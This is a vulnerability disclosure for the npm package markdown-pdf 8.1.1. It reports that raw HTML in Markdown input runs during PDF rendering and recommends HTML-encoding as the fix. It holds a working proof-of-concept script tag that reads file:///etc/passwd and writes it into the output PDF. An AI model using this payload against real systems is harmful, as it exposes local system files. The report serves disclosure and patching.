I would like to report local file reading in markdown-pdf.
It allows injection of malicious HTML, which can be used to read local files.
Module name: markdown-pdf
Version: 8.1.1
npm page: https://www.npmjs.com/package/markdown-pdf
Node module that converts Markdown files to PDFs.
The PDF looks great because it is styled by HTML5 Boilerplate. What? - Yes! Your Markdown is first converted to HTML, then pushed into the HTML5 Boilerplate index.html. Phantomjs renders the page and saves it to a PDF. You can even customise the style of the PDF by passing an optional path to your CSS and you can pre-process your markdown file before it is converted to a PDF by passing in a pre-processing function, for templating.
778 downloads in the last day
9,801 downloads in the last week
The markdown-pdf module converts Markdown files to PDF. Because the user-supplied input files are not sufficiently filtered, it is possible to inject malicious HTML into the rendered document.
Create test.md with the following content:

    # this is h1
    <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
Create test.js with the following content:

    var markdownpdf = require("markdown-pdf"), fs = require("fs")
    fs.createReadStream("test.md")
      .pipe(markdownpdf())
      .pipe(fs.createWriteStream("document.pdf"))
Run:

    node test.js

document.pdf appears in the same directory. After the conversion, the user can read a local file of the system: its contents are written into the rendered document by the injected script.

Recommended fix: HTML-encode user-supplied content that is not Markdown, so that raw HTML in the input is rendered as literal text instead of being executed by the renderer.